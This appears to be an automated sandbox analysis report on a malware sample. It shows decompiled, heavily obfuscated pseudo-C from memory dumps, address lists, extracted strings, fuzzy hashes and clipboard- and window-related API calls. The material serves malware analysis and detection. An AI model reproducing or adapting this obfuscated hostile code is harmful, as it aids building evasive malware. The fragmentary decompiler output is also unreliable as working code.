				_v356 = _v356 ^ 0x85dcd542;
				_v224 = 0x4f8f83;
				_v224 = _v224 >> 0xd;
				_v224 = _v224 + 0xffff7127;
				_v224 = _v224 ^ 0xffff73a3;
				_v364 = 0xd913f0;
				_v364 = _v364 << 4;
				_v364 = _v364 + 0xffffe4f7;
				_v364 = _v364 << 6;
				_v364 = _v364 ^ 0x64479578;
				_v428 = 0x4a41b6;
				_v428 = _v428 * 0x17;
				_t854 = 0x3f;
				_v428 = _v428 / _t854;
				_v428 = _v428 + 0x4db3;
				_v428 = _v428 ^ 0x00190a3f;
				_v220 = 0x230254;
				_v220 = _v220 | 0x25a195ca;
				_v220 = _v220 ^ 0x25a440f4;
				_v164 = 0x79946d;
				_v164 = _v164 | 0x95db6f2a;
				_v164 = _v164 ^ 0x95f5ff2f;
				_v420 = 0x20555;
				_v420 = _v420 + 0x49a3;
				_v420 = _v420 + 0xffffbaa0;
				_v420 = _v420 | 0xe66c6006;
				_v420 = _v420 ^ 0xe66d9785;
				_v308 = 0x796a8b;
				_v308 = _v308 ^ 0xcf3f3c6d;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 ^ 0x0001bf3e;
				_v412 = 0x7616a8;
				_v412 = _v412 | 0x7bfedefd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x1ef4c93d;
				_v300 = 0x1188f;
				_v300 = _v300 ^ 0x999c13a2;
				_t855 = 0x7c;
				_v300 = _v300 * 0xd;
				_v300 = _v300 ^ 0xccf47946;
				_v244 = 0xfd649;
				_v244 = _v244 | 0xf733d813;
				_v244 = _v244 >> 0xd;
				_v244 = _v244 ^ 0x0005235a;
				_v200 = 0x9e9324;
				_v200 = _v200 | 0x5ba25bdd;
				_v200 = _v200 ^ 0x5bba349a;
				_v404 = 0x2330b2;
				_v404 = _v404 * 0x51;
				_v404 = _v404 * 0x1e;
				_v404 = _v404 / _t961;
				_v404 = _v404 ^ 0x08a702e8;
				_v260 = 0xc225de;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x000fed8a;
				_v160 = 0x1c9307;
				_v160 = _v160 * 0x7e;
				_v160 = _v160 ^ 0x0e1bcc6b;
				_v192 = 0x8cb0be;
				_v192 = _v192 + 0x65a1;
				_v192 = _v192 ^ 0x008009d9;
				_v292 = 0x92bc67;
				_v292 = _v292 + 0xffffc3fd;
				_v292 = _v292 * 0x71;
				_v292 = _v292 ^ 0x40aaac18;
				_v372 = 0x5656da;
				_v372 = _v372 << 8;
				_v372 = _v372 | 0x5ef74142;
				_v372 = _v372 ^ 0xc573e6be;
				_v372 = _v372 ^ 0x9b83b24b;
				_v264 = 0xbc65cb;
				_v264 = _v264 / _t855;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 ^ 0x0002a810;
				_v408 = 0xbec186;
				_v408 = _v408 + 0xffff9163;
				_t856 = 0x47;
				_v408 = _v408 * 0x59;
				_v408 = _v408 + 0xffff1ecb;
				_v408 = _v408 ^ 0x4229c32f;
				_v156 = 0x1bb444;
				_v156 = _v156 >> 0xc;
				_v156 = _v156 ^ 0x00030065;
				_v272 = 0x7ba9b3;
				_v272 = _v272 * 0x34;
				_v272 = _v272 >> 1;
				_v272 = _v272 ^ 0x0c847149;
				_v208 = 0xbd1be6;
				_v208 = _v208 | 0xd5578a84;
				_v208 = _v208 ^ 0xd5fa34ee;
				_v332 = 0xfe25dd;
				_v332 = _v332 * 0x2d;
				_v332 = _v332 | 0x1ec70227;
				_v332 = _v332 ^ 0x3eea9d65;
				_v444 = 0xc73971;
				_v444 = _v444 + 0xb32c;
				_v444 = _v444 | 0xfb97e021;
				_v444 = _v444 + 0xa24a;
				_v444 = _v444 ^ 0xfbde3b64;
				_v328 = 0xc31491;
				_v328 = _v328 / _t856;
				_t857 = 0x62;
				_v328 = _v328 / _t857;
				_v328 = _v328 ^ 0x0001fa75;
				_v184 = 0x1556a6;
				_v184 = _v184 | 0xd524b176;
				_v184 = _v184 ^ 0xd535a7ca;
				_v440 = 0x35c24;
				_v440 = _v440 | 0xb1338da5;
				_t858 = 0x12;
				_v440 = _v440 * 0x4e;
				_v440 = _v440 / _t858;
				_v440 = _v440 ^ 0x0e1fd3a6;
				_v168 = 0x2e720e;
				_v168 = _v168 ^ 0x20b0eb59;
				_v168 = _v168 ^ 0x209ff4ec;
				_v136 = 0xf8c881;
				_v136 = _v136 << 4;
				_v136 = _v136 ^ 0x0f86714c;
				_v176 = 0x30a8e4;
				_v176 = _v176 << 0xf;
				_v176 = _v176 ^ 0x54704d49;
				_v320 = 0xe820d3;
				_v320 = _v320 + 0x4a39;
				_v320 = _v320 + 0xffff8c06;
				_v320 = _v320 ^ 0x00e3b8f1;
				_v424 = 0xe23bc6;
				_v424 = _v424 | 0xb773a528;
				_v424 = _v424 + 0xffff9ee4;
				_v424 = _v424 + 0xd640;
				_v424 = _v424 ^ 0xb7f4e9e8;
				_v144 = 0x35d767;
				_v144 = _v144 | 0xb1fb0f4b;
				_v144 = _v144 ^ 0xb1f09f1e;
				_v432 = 0x220129;
				_v432 = _v432 + 0x2a56;
				_v432 = _v432 + 0xec9a;
				_v432 = _v432 | 0x35f45e8d;
				_v432 = _v432 ^ 0x35fbe95d;
				_v296 = 0x21bf48;
				_t859 = 0x63;
				_v296 = _v296 * 0x6e;
				_v296 = _v296 ^ 0xcf5ee5b0;
				_v296 = _v296 ^ 0xc1df8d86;
				_v128 = 0x83ca27;
				_v128 = _v128 >> 0xb;
				_v128 = _v128 ^ 0x0003e37b;
				_v416 = 0x1b76f6;
				_v416 = _v416 * 0x67;
				_v416 = _v416 ^ 0x5e43fefd;
				_v416 = _v416 | 0x6d16dae8;
				_v416 = _v416 ^ 0x7d5c7478;
				_v280 = 0x8e2df6;
				_v280 = _v280 ^ 0xeab8ff52;
				_v280 = _v280 | 0x6dde6fb0;
				_v280 = _v280 ^ 0xefff4d77;
				_v132 = 0xb4eda8;
				_v132 = _v132 + 0xffff14c3;
				_v132 = _v132 ^ 0x00bcd480;
				_v288 = 0x644029;
				_v288 = _v288 + 0xffff2e53;
				_v288 = _v288 / _t859;
				_v288 = _v288 ^ 0x00067a6b;
				_v216 = 0xec3ce2;
				_v216 = _v216 | 0x0e1cda73;
				_v216 = _v216 ^ 0x0ef221b1;
				_v256 = 0x587378;
				_v256 = _v256 + 0xc198;
				_t860 = 0x7d;
				_v256 = _v256 * 5;
				_v256 = _v256 ^ 0x01b10dc6;
				_v392 = 0x92ae50;
				_v392 = _v392 * 0x5f;
				_v392 = _v392 | 0xad1fc533;
				_v392 = _v392 << 7;
				_v392 = _v392 ^ 0xbff58d24;
				_v376 = 0xb00c13;
				_v376 = _v376 | 0x916d47ca;
				_v376 = _v376 ^ 0x4fad6c21;
				_v376 = _v376 ^ 0x8c20b6bd;
				_v376 = _v376 ^ 0x5270abc3;
				_v180 = 0x2c6669;
				_v180 = _v180 + 0xffff62ee;
				_v180 = _v180 ^ 0x00282217;
				_v188 = 0x326b32;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x0007b375;
				_v196 = 0x9bd2c1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x09b8b1db;
				_v204 = 0x1f9d8a;
				_v204 = _v204 + 0xffffb6a4;
				_v204 = _v204 ^ 0x0011e24b;
				_v384 = 0x673136;
				_v384 = _v384 << 0xa;
				_v384 = _v384 ^ 0x12bc0cc5;
				_v384 = _v384 / _t860;
				_v384 = _v384 ^ 0x01221bbd;
				_v212 = 0x91584a;
				_v212 = _v212 << 0xe;
				_v212 = _v212 ^ 0x561f57e7;
				_v240 = 0xb9c75a;
				_v240 = _v240 << 0x10;
				_v240 = _v240 | 0x65f0d503;
				_v240 = _v240 ^ 0xe7f439bf;
				_v360 = 0x5bc26f;
				_v360 = _v360 >> 4;
				_v360 = _v360 << 0xb;
				_t861 = 0x39;
				_v360 = _v360 / _t861;
				_v360 = _v360 ^ 0x00c77717;
				_v172 = 0x629181;
				_v172 = _v172 | 0xc284407b;
				_v172 = _v172 ^ 0xc2eb660c;
				_v316 = 0xe96bce;
				_v316 = _v316 + 0xffffcab9;
				_t862 = 0x1a;
				_v316 = _v316 / _t862;
				_v316 = _v316 ^ 0x000a023d;
				_v236 = 0xf837d5;
				_v236 = _v236 ^ 0x28ca4d9a;
				_t863 = 0xf;
				_v236 = _v236 / _t863;
				_v236 = _v236 ^ 0x02a25c79;
				_v324 = 0xcca430;
				_t864 = 0x58;
				_v324 = _v324 * 0x55;
				_v324 = _v324 / _t864;
				_v324 = _v324 ^ 0x00c4a948;
				_v448 = 0xca9885;
				_v448 = _v448 << 6;
				_t865 = 0x57;
				_v448 = _v448 * 0x76;
				_v448 = _v448 / _t865;
				_v448 = _v448 ^ 0x01076bc5;
				_v336 = 0x7ad46f;
				_v336 = _v336 + 0xffffd9cf;
				_t866 = 0x1d;
				_v336 = _v336 * 0x59;
				_v336 = _v336 ^ 0x2aa2cebc;
				_v252 = 0x3ea356;
				_v252 = _v252 << 1;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x46a0e067;
				_v148 = 0x4c106a;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0001e127;
				_v388 = 0x3a8b94;
				_v388 = _v388 + 0xffffc4aa;
				_v388 = _v388 + 0xffff3143;
				_v388 = _v388 / _t866;
				_v388 = _v388 ^ 0x000d4012;
				_v436 = 0xb558cd;
				_t867 = 0xe;
				_v436 = _v436 / _t867;
				_v436 = _v436 + 0x7cb9;
				_t962 = 0x4a7f8c3;
				_v104 = 0x800491f;
				_v436 = _v436 / _t961;
				_v436 = _v436 ^ 0x00055d95;
				_v268 = 0x4f2a38;
				_v268 = _v268 >> 9;
				_v268 = _v268 | 0xe8b3cd17;
				_v268 = _v268 ^ 0xe8bc8e8f;
				_v284 = 0x84377d;
				_v284 = _v284 << 0xf;
				_v284 = _v284 + 0xffff388a;
				_v284 = _v284 ^ 0x1bbc0ead;
				_v228 = 0x2ad291;
				_v228 = _v228 + 0x8129;
				_v228 = _v228 ^ 0xdb87be02;
				_v228 = _v228 ^ 0xdbac3157;
				_v396 = 0x7db796;
				_v396 = _v396 ^ 0x7a0b48f6;
				_v396 = _v396 ^ 0x3362827b;
				_v396 = _v396 + 0xffff5a7a;
				_v396 = _v396 ^ 0x4918c81d;
				_v152 = 0xea73bc;
				_v152 = _v152 | 0xe5873d2c;
				_v152 = _v152 ^ 0xe5ed942b;
				_v232 = 0xcef632;
				_v92 = 0x48;
				_v100 = 0x100;
				_v232 = _v232 * 0x56;
				_v232 = _v232 ^ 0x9c0a1ca3;
				_v232 = _v232 ^ 0xd98b3af2;
				_v344 = 0x56ea62;
				_v344 = _v344 << 9;
				_v344 = _v344 << 5;
				_v344 = _v344 ^ 0x4bc13b3f;
				_v344 = _v344 ^ 0xf15a9eb4;
				_v352 = 0xecd8a3;
				_v352 = _v352 << 6;
				_v352 = _v352 | 0x62fa7efd;
				_v352 = _v352 + 0xa6a5;
				_v352 = _v352 ^ 0x7bf0f0a6;
				while(1) {
					L1:
					_t812 = 0x5427714;
					while(1) {
						L2:
						while(1) {
							L3:
							_t939 = 0x38654c9;
							do {
								L4:
								_t971 = _t846 - _t962;
								if(_t971 > 0) {
									__eflags = _t846 - 0x5095c78;
									if(_t846 == 0x5095c78) {
										_t846 = 0x2905b1e;
										goto L34;
									} else {
										__eflags = _t846 - _t812;
										if(_t846 == _t812) {
											_t819 = E0104758F(_v108);
											_t846 = 0x17db3ff;
											__eflags = _t819;
											_t966 =  !=  ? 1 : _t966;
											goto L1;
										} else {
											__eflags = _t846 - 0x55ddb8b;
											if(__eflags == 0) {
												_push(_v392);
												_push(0x1041000);
												__eflags = E010577BD( *((intOrPtr*)(_t959 + 4)), _v376,  &_v112, _v180, _v248, _v188, _v196, _v204,  *_t959, _v120, _v384, E01043F5C(_v216, _v256, __eflags), _v212) - _v368;
												_t846 =  ==  ? 0x38654c9 : 0x1f4d081;
												E01060352(_v240, _v360, _t820, _v172);
												_t967 = _t967 + 0x3c;
												goto L22;
											} else {
												__eflags = _t846 - 0x800491f;
												if(_t846 == 0x800491f) {
													_v116 = _v100;
													_t827 = E01048B42(_v120,  &_v124, _v140, _v100, _v264, _v408, _v156, _v272);
													_t967 = _t967 + 0x18;
													__eflags = _t827 - _v400;
													_t877 = 0x3d1a83d;
													_t812 = 0x5427714;
													_t846 =  ==  ? 0x3d1a83d : 0xe2d4ad7;
													goto L3;
												} else {
													__eflags = _t846 - 0xe2d4ad7;
													if(_t846 != 0xe2d4ad7) {
														goto L34;
													} else {
														E01042153(_v224, _v232, _v344, _v120, _v352);
													}
												}
											}
										}
									}
								} else {
									if(_t971 == 0) {
										_push(_v440);
										_push(0x1041000);
										_t964 = E01043F5C(_v328, _v184, __eflags);
										_v116 = _v92;
										_t816 = E0104220A(_t813, _v124, _v340,  &_v76, _v168, _v136, _v176, _v320, _v424, _v144, _v92, _v92,  &_v116, _v432);
										_t967 = _t967 + 0x30;
										__eflags = _t816 - _v304;
										if(_t816 != _v304) {
											_t846 = 0x1f4d081;
										} else {
											E01041ED4( &_v68, _v296,  *0x1066048 + 0x24, 0x40, _v128, _v416);
											_t967 = _t967 + 0x10;
											_t846 = 0x55ddb8b;
										}
										E01060352(_v280, _v132, _t964, _v288);
										goto L22;
									} else {
										if(_t846 == 0x17db3ff) {
											E0105CDFF(_v336, _v108, _v252);
											_t846 = 0x2a5562c;
											while(1) {
												L1:
												_t812 = 0x5427714;
												goto L2;
											}
										} else {
											if(_t846 == 0x1f4d081) {
												E01041F77(_v124, _v284, _v228, _v396, _v152);
												_t967 = _t967 + 0xc;
												_t846 = 0xe2d4ad7;
												while(1) {
													L1:
													_t812 = 0x5427714;
													goto L2;
												}
											} else {
												if(_t846 == 0x2905b1e) {
													_push(_v220);
													_push(0x1041150);
													_t831 = E01043F5C(_v364, _v428, __eflags);
													_push(_v308);
													_push(0x1041030);
													__eflags = E010554FD(_v412,  &_v120, _t831, _v300, _v244, _v380, _v200, E01043F5C(_v164, _v420, __eflags)) - _v348;
													_t846 =  ==  ? _v104 : 0x66c680f;
													E01060352(_v404, _v260, _t831, _v160);
													E01060352(_v192, _v292, _t832, _v372);
													_t959 = _v96;
													_t967 = _t967 + 0x38;
													L22:
													_t962 = 0x4a7f8c3;
													_t812 = 0x5427714;
													_t877 = 0x3d1a83d;
													_t939 = 0x38654c9;
													goto L34;
												} else {
													if(_t846 == 0x2a5562c) {
														E01041F77(_v112, _v148, _v388, _v436, _v268);
														_t967 = _t967 + 0xc;
														_t846 = 0x1f4d081;
														while(1) {
															L1:
															_t812 = 0x5427714;
															goto L2;
														}
													} else {
														if(_t846 == _t939) {
															_t839 = E0105EC19(_v112, _v316, _v236,  &_v108, _v124, _v356, _v324);
															_t967 = _t967 + 0x14;
															__eflags = _t839;
															_t812 = 0x5427714;
															_t846 =  ==  ? 0x5427714 : 0x2a5562c;
															goto L2;
														} else {
															if(_t846 != _t877) {
																goto L34;
															} else {
																E01063044(_v208, _v124, _v332, _v312, _v444);
																_t967 = _t967 + 0xc;
																_t846 =  ==  ? _t962 : 0x1f4d081;
																while(1) {
																	L1:
																	_t812 = 0x5427714;
																	L2:
																	L3:
																	_t939 = 0x38654c9;
																	goto L4;
																}
															}
														}
													}
												}
											}
										}
									}
								}
								L29:
								return _t966;
								L34:
								__eflags = _t846 - 0x66c680f;
							} while (__eflags != 0);
							goto L29;
						}
					}
				}
			}

0x01057edb
0x01057edd
0x01057ee4
0x01057ef1
0x01057efc
0x01057efe
0x01057f05
0x01057f0a
0x01057f12
0x01057f1d
0x01057f22
0x01057f28
0x01057f2d
0x01057f35
0x01057f3d
0x01057f45
0x01057f4f
0x01057f50
0x01057f54
0x01057f5c
0x01057f67
0x01057f72
0x01057f7d
0x01057f85
0x01057f8a
0x01057f8f
0x01057f97
0x01057f9f
0x01057faa
0x01057fbd
0x01057fc4
0x01057fcf
0x01057fda
0x01057fe5
0x01057ff0
0x01057ffb
0x01058006
0x01058011
0x0105801c
0x01058027
0x01058032
0x0105803d
0x01058048
0x01058053
0x0105805e
0x01058069
0x01058074
0x0105807c
0x01058084
0x0105808c
0x01058091
0x01058099
0x010580a1
0x010580af
0x010580b3
0x010580bb
0x010580c3
0x010580ce
0x010580d6
0x010580e1
0x010580ec
0x010580f4
0x010580f9
0x01058101
0x01058106
0x0105810e
0x0105811b
0x01058127
0x0105812c
0x01058130
0x01058138
0x01058140
0x0105814b
0x01058156
0x01058161
0x0105816c
0x01058177
0x01058182
0x0105818a
0x01058192
0x0105819a
0x010581a2
0x010581aa
0x010581b5
0x010581c0
0x010581c8
0x010581d3
0x010581db
0x010581e3
0x010581e8
0x010581f0
0x010581fb
0x01058210
0x01058211
0x01058218
0x01058223
0x0105822e
0x01058239
0x01058241
0x0105824c
0x01058257
0x01058262
0x0105826d
0x0105827a
0x01058283
0x0105828f
0x01058293
0x0105829b
0x010582a6
0x010582bc
0x010582c7
0x010582da
0x010582e1
0x010582ec
0x010582f7
0x01058302
0x0105830d
0x01058318
0x0105832b
0x01058332
0x0105833d
0x01058345
0x0105834a
0x01058352
0x0105835a
0x01058362
0x01058376
0x0105837d
0x01058385
0x01058390
0x0105839a
0x010583a9
0x010583ac
0x010583b0
0x010583b8
0x010583c0
0x010583cb
0x010583d3
0x010583de
0x010583f1
0x010583f8
0x010583ff
0x0105840a
0x01058415
0x01058420
0x0105842b
0x0105843e
0x01058445
0x01058450
0x0105845b
0x01058463
0x0105846b
0x01058473
0x0105847b
0x01058483
0x01058499
0x010584a7
0x010584ac
0x010584b5
0x010584c0
0x010584cb
0x010584d6
0x010584e1
0x010584e9
0x010584f6
0x010584f7
0x01058501
0x01058505
0x0105850d
0x01058518
0x01058523
0x0105852e
0x01058539
0x01058541
0x0105854c
0x01058557
0x0105855f
0x0105856a
0x01058575
0x01058580
0x0105858b
0x01058596
0x0105859e
0x010585a6
0x010585ae
0x010585b6
0x010585be
0x010585c9
0x010585d4
0x010585df
0x010585e7
0x010585ef
0x010585f7
0x010585ff
0x01058607
0x0105861e
0x01058621
0x01058628
0x01058633
0x0105863e
0x01058649
0x01058651
0x0105865c
0x01058669
0x0105866d
0x01058675
0x0105867d
0x01058685
0x01058690
0x0105869b
0x010586a6
0x010586b1
0x010586bc
0x010586c7
0x010586d2
0x010586dd
0x010586f3
0x010586fa
0x01058705
0x01058710
0x0105871b
0x01058726
0x01058731
0x01058744
0x01058745
0x0105874c
0x01058757
0x01058764
0x01058768
0x01058770
0x01058775
0x0105877d
0x01058785
0x0105878d
0x01058795
0x0105879d
0x010587a5
0x010587b0
0x010587bb
0x010587c6
0x010587d1
0x010587d9
0x010587e4
0x010587ef
0x010587f7
0x01058802
0x0105880d
0x01058818
0x01058823
0x0105882b
0x01058830
0x0105883e
0x01058842
0x0105884a
0x01058855
0x0105885d
0x01058868
0x01058873
0x0105887b
0x01058886
0x01058891
0x01058899
0x0105889e
0x010588ab
0x010588b0
0x010588b6
0x010588be
0x010588c9
0x010588d4
0x010588df
0x010588ea
0x010588fc
0x01058901
0x0105890a
0x01058915
0x01058920
0x01058932
0x01058937
0x01058940
0x0105894b
0x0105895e
0x01058961
0x01058973
0x0105897a
0x01058985
0x0105898d
0x01058997
0x0105899a
0x010589a6
0x010589aa
0x010589b2
0x010589bd
0x010589d0
0x010589d3
0x010589da
0x010589e5
0x010589f0
0x010589f7
0x010589ff
0x01058a0a
0x01058a15
0x01058a1d
0x01058a28
0x01058a30
0x01058a38
0x01058a48
0x01058a4c
0x01058a54
0x01058a60
0x01058a63
0x01058a67
0x01058a77
0x01058a7c
0x01058a87
0x01058a8b
0x01058a93
0x01058a9e
0x01058aa6
0x01058ab1
0x01058abc
0x01058ac7
0x01058acf
0x01058ada
0x01058ae5
0x01058af0
0x01058afb
0x01058b06
0x01058b11
0x01058b19
0x01058b21
0x01058b29
0x01058b31
0x01058b39
0x01058b44
0x01058b4f
0x01058b5a
0x01058b6d
0x01058b78
0x01058b83
0x01058b8a
0x01058b95
0x01058ba0
0x01058ba8
0x01058bad
0x01058bb2
0x01058bba
0x01058bc2
0x01058bca
0x01058bcf
0x01058bd7
0x01058bdf
0x01058be7
0x01058be7
0x01058be7
0x01058bec
0x01058bec
0x01058bf1
0x01058bf1
0x01058bf1
0x01058bf6
0x01058bf6
0x01058bf6
0x01058bf8
0x01058f0e
0x01058f14
0x010590a4
0x00000000
0x01058f1a
0x01058f1a
0x01058f1c
0x0105908d
0x01059094
0x0105909a
0x0105909c
0x00000000
0x01058f22
0x01058f22
0x01058f28
0x01058fdb
0x01058fed
0x01059059
0x01059075
0x01059079
0x0105907e
0x00000000
0x01058f2e
0x01058f2e
0x01058f34
0x01058f93
0x01058fb4
0x01058fbb
0x01058fc7
0x01058fc9
0x01058fce
0x01058fd3
0x00000000
0x01058f36
0x01058f36
0x01058f3c
0x00000000
0x01058f42
0x01058f62
0x01058f67
0x01058f3c
0x01058f34
0x01058f28
0x01058f1c
0x01058bfe
0x01058bfe
0x01058e14
0x01058e26
0x01058e3d
0x01058e46
0x01058e8f
0x01058e94
0x01058e97
0x01058e9e
0x01058ed3
0x01058ea0
0x01058ec4
0x01058ec9
0x01058ecc
0x01058ecc
0x01058eee
0x00000000
0x01058c04
0x01058c0a
0x01058e03
0x01058e0a
0x01058be7
0x01058be7
0x01058be7
0x00000000
0x01058be7
0x01058c10
0x01058c16
0x01058dd8
0x01058ddd
0x01058de0
0x01058be7
0x01058be7
0x01058be7
0x00000000
0x01058be7
0x01058c1c
0x01058c22
0x01058cfa
0x01058d09
0x01058d0e
0x01058d13
0x01058d27
0x01058d6c
0x01058d80
0x01058d89
0x01058da4
0x01058da9
0x01058db0
0x01058ef5
0x01058ef5
0x01058efa
0x01058eff
0x01058f04
0x00000000
0x01058c28
0x01058c2e
0x01058ce8
0x01058ced
0x01058cf0
0x01058be7
0x01058be7
0x01058be7
0x00000000
0x01058be7
0x01058c34
0x01058c36
0x01058caf
0x01058cb4
0x01058cbc
0x01058cbe
0x01058cc3
0x00000000
0x01058c38
0x01058c3a
0x00000000
0x01058c40
0x01058c60
0x01058c67
0x01058c78
0x01058be7
0x01058be7
0x01058be7
0x01058bec
0x01058bf1
0x01058bf1
0x00000000
0x01058bf1
0x01058be7
0x01058c3a
0x01058c36
0x01058c2e
0x01058c22
0x01058c16
0x01058c0a
0x01058bfe
0x01058f6c
0x01058f76
0x010590a9
0x010590a9
0x010590a9
0x00000000
0x010590b5
0x01058bf1
0x01058bec

Strings

)@d, xrefs: 010586D2
nz , xrefs: 01057F7D
xsX, xrefs: 01058726
bV, xrefs: 01058BA0
IMpT, xrefs: 0105855F
V*, xrefs: 010585E7
xt\}, xrefs: 0105867D
9J, xrefs: 01058575
e, xrefs: 010583D3
<, xrefs: 01058705
[8, xrefs: 01058027
8*O, xrefs: 01058A93
H, xrefs: 01058B6D
if,, xrefs: 010587A5
2k2, xrefs: 010587C6
61g, xrefs: 01058823

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: )@d$2k2$61g$8*O$9J$H$IMpT$V*$[8$bV$e$if,$nz $xsX$xt\}$<
API String ID: 0-3960585842
Opcode ID: bcde140d2a7e35b89b63081b70f68454961f26610c62a79ff2be98aebb72d91a
Instruction ID: b1dfb71e31fd925f9edb1689e83708b21726721d18bdac41b5b64093c7569aca
Opcode Fuzzy Hash: bcde140d2a7e35b89b63081b70f68454961f26610c62a79ff2be98aebb72d91a
Instruction Fuzzy Hash: 8A92FD715093818FD3B9CF65C98AB9BBBE1BBC5304F10891DE6DA86260D7B18549CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5EE0, Relevance: 19.9, APIs: 13, Instructions: 427threadclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6183
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B61A1
AnyPopup.USER32 ref: 6E9B6305
GetCurrentThread.KERNEL32 ref: 6E9B6401

Part of subcall function 6E9B5A30: IsSystemResumeAutomatic.KERNEL32 ref: 6E9B5BA0

GetUserDefaultUILanguage.KERNEL32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6355

Part of subcall function 6E9B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E9B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E9B5A3C
Part of subcall function 6E9B5A30: CloseClipboard.USER32 ref: 6E9B5A73
Part of subcall function 6E9B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E9B5B30

GetErrorMode.KERNEL32(0000002E,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6448
GetThreadErrorMode.KERNEL32(?,?,?,?,?,?,6E9B6935), ref: 6E9B64B0
GetClipboardViewer.USER32 ref: 6E9B5F76

Part of subcall function 6E9B5C20: UnregisterApplicationRestart.KERNEL32 ref: 6E9B5C40
Part of subcall function 6E9B5C20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5CAC

GetSystemDefaultLangID.KERNEL32 ref: 6E9B5FE3
GetOpenClipboardWindow.USER32(?,-00000003,00000000,?,?,?,?,?,?,6E9B6935), ref: 6E9B6052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B6081
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B6108
GetCurrentThread.KERNEL32 ref: 6E9B612E

Part of subcall function 6E9B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5E04
Part of subcall function 6E9B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9B5E74
Part of subcall function 6E9B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E9B5E93
Part of subcall function 6E9B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E9B5EA4

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardUnothrow_t@std@@@__ehfuncinfo$??2@$ThreadWindow$Open$CurrentDefaultErrorModeSystem$ApplicationAutomaticCheckCloseDimensionsForegroundLangLanguageMarkMenuPopupRestartResumeSwitchUnregisterUserViewer
String ID:
API String ID: 2542842856-0
Opcode ID: b6646f5b58d7f80f9bfa0e60e0b3ae404f216fe52b82e31a4d4fb5439bb129e4
Instruction ID: 6e0f75ff34d02586ccdb063075acf00904efa514bd4cb7fc457f48743792a646
Opcode Fuzzy Hash: b6646f5b58d7f80f9bfa0e60e0b3ae404f216fe52b82e31a4d4fb5439bb129e4
Instruction Fuzzy Hash: AFE1D971D24F444AD317DEB684111ABF3AF6FEB6D4F048B2AF446B6152FB24E8D28940

Uniqueness

Uniqueness Score: -1.00%

Function 0104758F, Relevance: 19.5, Strings: 15, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0104758F(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				void* _t861;
				void* _t862;
				void* _t869;
				void* _t872;
				void* _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t906;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
